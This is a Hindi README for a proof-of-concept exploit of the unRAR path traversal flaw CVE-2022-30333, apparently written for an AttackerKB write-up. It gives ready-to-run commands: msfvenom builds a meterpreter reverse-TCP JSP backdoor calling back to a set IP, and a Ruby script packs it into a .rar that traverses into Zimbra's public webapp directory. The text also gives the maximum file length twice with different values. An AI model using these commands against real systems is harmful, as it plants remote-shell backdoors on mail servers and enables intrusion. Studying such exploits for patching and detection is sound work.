
CVE-2022-30333 में unRAR में पथ ट्रैवर्सल के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो मनमाने स्थानों पर पेलोड स्थापित करने के लिए दुर्भावनापूर्ण .rar फ़ाइलें उत्पन्न करता है। पेनिट्रेशन टेस्टिंग के लिए Metasploit और msfvenom के साथ एकीकृत होता है।
CVE-2022-30333 के लिए एक प्रूफ ऑफ कॉन्सेप्ट - यह unRAR के 6.11 से पहले के संस्करणों में एक पथ ट्रावर्सल कमजोरी है। मैंने इसे AttackerKB writeup के लिए एक प्रदर्शन के रूप में बनाया, और इसे जल्द ही एक Metasploit Module में शामिल करने की उम्मीद है!
मूल रूप से, आप एक लक्ष्य (पथ ट्रावर्सल सहित) और कुछ फ़ाइल डेटा प्रदान करते हैं, और यह टूल एक .rar उत्पन्न करेगा जो उस फ़ाइल को उस स्थान पर निकालेगा। अधिकतम फ़ाइल लंबाई 104 बाइट्स है, और अधिकतम फ़ाइल लंबाई 4096 बाइट्स है। (यह कमजोरी में निहित नहीं है, यह सिर्फ वही है जो मैंने फ़ाइल बनाते समय चुना था)।
उदाहरण के लिए, msfvenom के साथ एक बैकडोर बनाएँ:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
फिर एक .rar फ़ाइल बनाएँ, .jsp को कहीं मजेदार जगह पर रोपते हुए:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar